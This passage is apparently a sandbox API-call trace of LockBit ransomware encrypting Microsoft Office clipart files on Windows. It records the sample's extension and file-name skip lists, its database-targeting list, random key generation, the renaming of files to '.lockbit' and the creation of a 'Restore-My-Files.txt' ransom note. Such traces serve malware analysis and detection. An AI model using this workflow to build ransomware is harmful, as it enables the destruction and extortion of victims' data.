(lpString1=".idx", lpString2=".JPG") returned -1 [0161.218] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.218] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.218] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.218] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0384885.JPG") returned 1 [0161.218] lstrcmpiW (lpString1="ntldr", lpString2="J0384885.JPG") returned 1 [0161.218] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0384885.JPG") returned 1 [0161.218] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0384885.JPG") returned -1 [0161.218] lstrcmpiW (lpString1="autorun.inf", lpString2="J0384885.JPG") returned -1 [0161.218] lstrcmpiW (lpString1="thumbs.db", lpString2="J0384885.JPG") returned 1 [0161.219] lstrcmpiW (lpString1="iconcache.db", lpString2="J0384885.JPG") returned -1 [0161.219] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.219] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384885.JPG") returned=".JPG" [0161.219] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.219] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.219] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.219] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.219] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.219] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.219] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.219] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.219] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.219] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.219] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.220] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.220] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.220] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.220] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.220] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.220] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384885.JPG.lockbit") returned 72 [0161.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384885.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384885.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.221] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.221] malloc (_Size=0x40068) returned 0x3df0008 [0161.221] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=97145) returned 1 [0161.221] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.222] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.222] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.222] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.222] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.227] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384885.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384885.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.227] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.227] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.231] free (_Block=0x1fa2ed8) [0161.231] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384885.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.231] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.231] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.231] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x567be5d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x14033, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0384888.JPG", cAlternateFileName="")) returned 1 [0161.231] lstrcmpiW (lpString1=".", lpString2="J0384888.JPG") returned -1 [0161.231] lstrcmpiW (lpString1="..", lpString2="J0384888.JPG") returned -1 [0161.231] PathFindExtensionW (pszPath="J0384888.JPG") returned=".JPG" [0161.231] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.231] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.231] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.231] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.231] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.231] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.231] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.231] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.232] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.232] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.233] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.233] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.233] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.233] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.233] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.233] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0384888.JPG") returned 1 [0161.233] lstrcmpiW (lpString1="ntldr", lpString2="J0384888.JPG") returned 1 [0161.233] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0384888.JPG") returned 1 [0161.233] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0384888.JPG") returned -1 [0161.233] lstrcmpiW (lpString1="autorun.inf", lpString2="J0384888.JPG") returned -1 [0161.233] lstrcmpiW (lpString1="thumbs.db", lpString2="J0384888.JPG") returned 1 [0161.233] lstrcmpiW (lpString1="iconcache.db", lpString2="J0384888.JPG") returned -1 [0161.233] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.233] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384888.JPG") returned=".JPG" [0161.233] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.233] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.233] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.234] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.234] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.234] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384888.JPG.lockbit") returned 72 [0161.234] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384888.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384888.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.236] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.236] malloc (_Size=0x40068) returned 0x3df0008 [0161.236] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=81971) returned 1 [0161.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.236] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.236] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.237] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.258] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384888.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384888.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.258] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.258] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.261] free (_Block=0x1fa2ed8) [0161.261] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384888.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.261] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.261] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0161.262] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x661fae90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd8f6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0384895.JPG", cAlternateFileName="")) returned 1 [0161.262] lstrcmpiW (lpString1=".", lpString2="J0384895.JPG") returned -1 [0161.262] lstrcmpiW (lpString1="..", lpString2="J0384895.JPG") returned -1 [0161.262] PathFindExtensionW (pszPath="J0384895.JPG") returned=".JPG" [0161.262] lstrcmpiW (lpString1=".386", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".cmd", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".exe", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".ani", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".adv", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".theme", lpString2=".JPG") returned 1 [0161.262] lstrcmpiW (lpString1=".msi", lpString2=".JPG") returned 1 [0161.262] lstrcmpiW (lpString1=".msp", lpString2=".JPG") returned 1 [0161.262] lstrcmpiW (lpString1=".com", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".diagpkg", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".nls", lpString2=".JPG") returned 1 [0161.262] lstrcmpiW (lpString1=".diagcab", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".lock", lpString2=".JPG") returned 1 [0161.262] lstrcmpiW (lpString1=".ocx", lpString2=".JPG") returned 1 [0161.262] lstrcmpiW (lpString1=".mpa", lpString2=".JPG") returned 1 [0161.262] lstrcmpiW (lpString1=".cpl", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".mod", lpString2=".JPG") returned 1 [0161.262] lstrcmpiW (lpString1=".hta", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".icns", lpString2=".JPG") returned -1 [0161.262] lstrcmpiW (lpString1=".prf", lpString2=".JPG") returned 1 [0161.262] lstrcmpiW (lpString1=".rtp", lpString2=".JPG") returned 1 [0161.262] lstrcmpiW (lpString1=".diagcfg", lpString2=".JPG") returned -1 [0161.263] lstrcmpiW (lpString1=".msstyles", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".bin", lpString2=".JPG") returned -1 [0161.263] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.263] lstrcmpiW (lpString1=".shs", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".drv", lpString2=".JPG") returned -1 [0161.263] lstrcmpiW (lpString1=".wpx", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".bat", lpString2=".JPG") returned -1 [0161.263] lstrcmpiW (lpString1=".rom", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".msc", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".spl", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".ps1", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".msu", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".ics", lpString2=".JPG") returned -1 [0161.263] lstrcmpiW (lpString1=".key", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".mp3", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".reg", lpString2=".JPG") returned 1 [0161.263] lstrcmpiW (lpString1=".dll", lpString2=".JPG") returned -1 [0161.263] lstrcmpiW (lpString1=".ini", lpString2=".JPG") returned -1 [0161.263] lstrcmpiW (lpString1=".idx", lpString2=".JPG") returned -1 [0161.263] lstrcmpiW (lpString1=".sys", lpString2=".JPG") returned 1 [0161.264] lstrcmpiW (lpString1=".hlp", lpString2=".JPG") returned -1 [0161.264] lstrcmpiW (lpString1=".ico", lpString2=".JPG") returned -1 [0161.264] lstrcmpiW (lpString1=".lnk", lpString2=".JPG") returned 1 [0161.264] lstrcmpiW (lpString1=".rdp", lpString2=".JPG") returned 1 [0161.264] lstrcmpiW (lpString1=".lockbit", lpString2=".JPG") returned 1 [0161.264] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0384895.JPG") returned 1 [0161.264] lstrcmpiW (lpString1="ntldr", lpString2="J0384895.JPG") returned 1 [0161.264] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0384895.JPG") returned 1 [0161.264] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0384895.JPG") returned -1 [0161.264] lstrcmpiW (lpString1="autorun.inf", lpString2="J0384895.JPG") returned -1 [0161.264] lstrcmpiW (lpString1="thumbs.db", lpString2="J0384895.JPG") returned 1 [0161.264] lstrcmpiW (lpString1="iconcache.db", lpString2="J0384895.JPG") returned -1 [0161.264] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0161.264] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384895.JPG") returned=".JPG" [0161.264] lstrcmpiW (lpString1=".rar", lpString2=".JPG") returned 1 [0161.264] lstrcmpiW (lpString1=".zip", lpString2=".JPG") returned 1 [0161.264] lstrcmpiW (lpString1=".7z", lpString2=".JPG") returned -1 [0161.264] lstrcmpiW (lpString1=".ckp", lpString2=".JPG") returned -1 [0161.264] lstrcmpiW (lpString1=".dacpac", lpString2=".JPG") returned -1 [0161.264] lstrcmpiW (lpString1=".db", lpString2=".JPG") returned -1 [0161.264] lstrcmpiW (lpString1=".db-shm", lpString2=".JPG") returned -1 [0161.264] lstrcmpiW (lpString1=".db-wal", lpString2=".JPG") returned -1 [0161.264] lstrcmpiW (lpString1=".db3", lpString2=".JPG") returned -1 [0161.264] lstrcmpiW (lpString1=".dbf", lpString2=".JPG") returned -1 [0161.264] lstrcmpiW (lpString1=".dbc", lpString2=".JPG") returned -1 [0161.265] lstrcmpiW (lpString1=".dbs", lpString2=".JPG") returned -1 [0161.265] lstrcmpiW (lpString1=".dbt", lpString2=".JPG") returned -1 [0161.265] lstrcmpiW (lpString1=".dbv", lpString2=".JPG") returned -1 [0161.265] lstrcmpiW (lpString1=".frm", lpString2=".JPG") returned -1 [0161.265] lstrcmpiW (lpString1=".mdf", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".mrg", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".mwb", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".myd", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".ndf", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".qry", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".sdb", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".sdf", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".sql", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".sqlite", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".sqlite3", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".sqlitedb", lpString2=".JPG") returned 1 [0161.265] lstrcmpiW (lpString1=".tmd", lpString2=".JPG") returned 1 [0161.265] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384895.JPG.lockbit") returned 72 [0161.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384895.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0384895.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0161.266] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0161.266] malloc (_Size=0x40068) returned 0x3df0008 [0161.266] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=55542) returned 1 [0161.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0161.267] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0161.268] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0161.268] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0161.268] ReadFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0161.275] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384895.JPG.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384895.JPG.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0161.275] malloc (_Size=0xa6) returned 0x1fa2ed8 [0161.275] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0161.278] free (_Block=0x1fa2ed8) [0161.278] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0384895.JPG" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0161.278] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0161.278] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft 